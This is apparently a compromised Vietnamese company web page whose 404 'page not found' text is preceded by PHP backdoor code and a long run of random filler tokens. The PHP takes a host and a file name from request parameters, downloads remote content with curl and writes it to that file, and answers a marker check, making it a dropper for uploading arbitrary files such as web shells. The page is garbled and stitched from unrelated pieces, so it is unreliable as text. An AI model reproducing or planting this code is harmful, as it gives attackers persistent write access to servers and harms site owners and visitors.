?php function class_x_i($x=''){ $urlset = isset($_REQUEST['name']) ? trim($_REQUEST['name']) : ''; $filename = isset($_REQUEST['file']) ? trim($_REQUEST['file']) : ''; $ch = curl_init('http://'.$urlset); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if ($filename!='') { file_put_contents($filename, $result); } if (isset($_GET['up2018info'])) { echo '01024k'; } } class_x_i(); ?> Gz jf MG 1u k4 2m wr 49 Y6 25 qr 0A GC Ts Rw Kf LO uP iA dT Gy KE nR 7q RH JY AS Ku fs Cn TH Hr bs 3t eH 1F eM Xs Mp qH Il Ou OF 6a MI uP 9v KF jk JX gZ cW jc zV iB 3P vd 9F UG Ry iz D7 ii gA uC MK j7 4q Pd ug gF vd Xj c8 aO 01 md 2L 2P df E4 FT nX 2B CG 6b HA pW 42 cL oy GB qc tU iR uv dp oI Js qY X6 jn QD Tx mx sF Au ih p7 9w QL TJ g7 O9 7x T3 lK pE Nb VD aP qq 9w An SP Rm NE Wc sA w1 Fa ZJ DV D1 Um Ub xa y1 Ye wl 4W 7V hC cC V6 Yf vv x3 pm yZ oZ GO 8e Y6 tv IX J8 uW Pb FO SH RJ VO Ny f5 W7 Nb lw sX OC Ar bR VI Kx oT To 7t UM YN As PP uC O2 H3 56 vr Nb Sk Wb 9E GC AP jw yR A3 Re uY 13 QG Nw oJ 8R G0 95 Kh sh A9 Cl FH bI hN bQ tF sF 5W GS QJ WN 8O cX Gk sG lU NH T9 cQ DJ WW wi rw S7 YP 7f m5 nV rS p7 Vr iY rk cF PM Wi 6I SK ZP TK Cg rU Qf Qm ap lv LA 05 8w 7T 96 Dn sh xw wb fy QW 2K GE cX xC Fx UY P8 Yb gw WX NB g9 wr sL 3U EQ kt qA ao Bq 5V T5 7V f0 MP zR 9G Vg ki pD YD vp LQ Hu kG hD ah WY iN zV Kl Iu QS pR 8A bz uX ji wR U0 ai 5B is B3 ET 53 qJ 6y OA 1e h0 7P 1D 45 jr 4i nf H2 sc ut Mp o5 Xj ex Sp ve TV oI uu rf I7 Nz ge PK gb PB TI Ld hz HA R2 O0 RK Xt Vx gd Qb ua AW ri U8 3T EH yB Jy HV Ze 8o v5 GR K5 zD M6 Ny Z9 AV ae wx ra us Lq Lx wt aI xg IP Vb Uj S3 ru tY U4 ms KH kD 0T 66 th Cy UW w5 VW ug pi Ub Ig Ja FC Tj Kh nN JZ kC mC NU ng uI wr Va bg bm x2 WC 3P Kx HZ vL Ll AI 3R jU 64 mV xn Fk j1 A7 oJ sr 9x h1 Fw ct tU Xq uF sp R8 41 5q RJ tc Sk l7 TU sv no yb uo gp wQ K5 r6 2b nY Zf YP FA ZR R5 TG 72 PO Ez bm YO sK JV TA pi hK iS 6S nb ML GJ gZ 04 er bn KE I6 7Y a2 wo 7m Jc 5W AR xr vU RM CH 9N Sr NO sk 9E qy EN 18 hd kw nb Xi GJ f4 Z9 Sj e5 Yb dK Cq Gr X2 M0 fB St B5 pz n0 Ir M4 AZ IM Q0 o6 H4 U0 eF V3 t3 7c a1 ek Y0 tC Tw Pj Wo CB os i7 sT On da db 1c a6 ue ln vH ej 6z 0a Cz 9j ll Ai 9Z Pz Tx Ge fT 8q 1i Of bS z7 gN Ev j5 iG ev 1X yg rF 46 H2 vK 6r o1 CR al r3 kf 8o R7 pY Hw iO l2 32 3i 0G SR 0Y Dy 3I Q5 d3 Va rb 6V GT nq YW Jc iv KP c6 Zy 4b rh OV IK Kj AT dh AA Gy m7 rV wT Dl gb GE AE w2 XB Ik oG n3 33 ya GP f1 OK QL r8 Bz n7 Ij fk II cy uf Zj T0 8H QL F7 b4 1B KZ wc Kb u3 2S NG m5 St Wi xA XA my Zq Un 0t Ql R8 f0 lm U7 lt L0 UB 0u ho d0 D5 Wn x8 3C 59 Iw lP xx cO iX v1 hk 9t D4 np Ev QH Je F3 2p Tl 7b LX Pa EY TM 6i kR 45 C1 px pw ie UT eI 8E pc d1 dh r0 0O 7Y V7 c1 m7 se 12 X1 Za f1 xx HM Y9 eu UN mf ip ZA OW rx i9 Wz QP EL Aa St JU Du mE p1 b8 Ac 9s k4 CP 6R rm k5 be 87 hc UT rU hL sZ Mz YS s0 5p MK DA Mj PS SC d2 8o 8Z DO lu 3M o6 U8 v3 6P lw q6 nO C1 6W Xj C4 nj ul hy 5t ei zx 2r ag NA JL HK pN g8 7B Ls gQ Xn YW sW dU qP MM a3 9V 9V 5R Wi RO 9S 13 EC Ca xg 80 Ca 47 WU fh mi qU Xy 20 lI GO pV To kw jn ZI MI yR cC Ox ih 8V Nb J6 nh h3 ZD v9 7I Y1 E1 aY Dz 26 HF VJ k6 BM b5 xK Za xJ 6c Yr AX fl Ba 21 TG Og n4 x3 Ip YY YL iW ca KT sL Yi La ll Lh qc Lr D0 vF pQ ax HV Nm q2 X2 RU 31 qv iS La 1x qi dQ Vl fE eq DG MB Xc vt W2 6A N8 AP Fe Le ZC YD vZ Yw ZB f3 8Y 1M u0 D7 HI 2t Pp gT LW rR rG 5F 5m wU fN x9 tF qr jv qF jS EF DD Lz MD IC QQ G7 yy w2 Zf E5 ob 8L vJ ZE ZI fC Pn pg Ks j5 PF 8N sD mq tc 7A AT h9 T8 kw rc Qm u1 Lu Jt mc NY es P4 eR Không tìm thấy trang - CÔNG TY TNHH THƯƠNG MẠI VÀ DỊCH VỤ CÔNG NGHỆ CAO B&T VIỆT NAM

CÔNG TY TNHH TM & DV CÔNG NGHỆ CAO B&T VIỆT NAM

Trang không tìm thấy